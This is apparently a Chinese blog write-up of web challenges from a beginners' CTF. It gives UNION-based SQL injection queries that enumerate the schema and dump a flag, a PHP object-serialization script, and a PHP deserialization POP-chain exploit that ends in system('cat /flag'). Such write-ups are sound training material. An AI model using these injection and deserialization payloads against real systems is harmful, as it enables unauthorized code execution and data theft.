新生赛web题解

本文最后更新于:2024年4月6日 下午

ikun注入

常规的数字型注入

1
2
3
4
union select database();
union select table_name from information_schema.tables where table_schema=database();
union select column_name from information_schema.columns where table_name='F14g';
union select yourflag from F14g;

ez_serialize

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

class AHUctf{
    public $start = True;
    public function __destruct(){
        global $flag;
        if($this->start === True){
            echo "flag在这里".$flag;
        }
    }
}
$ahuctf=new AHUctf();
echo serialize($ahuctf);

ezpop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
error_reporting(0);
class func{
    public $func;
    public $content;
    public function __construct($func,$content){
        $this->func=$func;
        $this->content=$content;
    }
    public function __tostring(){
        call_user_func($this->func,$this->content);
    }
}
class output{
    public $output;
    public $hahaha;
    public function __construct($output,$hahaha){
        $this->output=$output;
        $this->hahaha=$hahaha;
    }
    public function myecho(){
        echo $output;
    }
    public function __invoke(){
        $this->output;
    }
    public function __wakeup(){
        if(preg_match('/system/i',$this->output)){
            die("hacker");
        }else{
            $this->hahaha->haha;
        }
    }
}
class tofunc{
    public $name;
    public function __construct($name){
        $this->name=$name;
    }
    public function __get($key){
        $function=$this->name;
        return $function();
    }
}
$func1= new func("system","cat /flag");
$output1=new output($func1,"");
$tofunc1=new tofunc($output1);
$output2=new output("",$tofunc1);
echo serialize($output2);
CTF

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!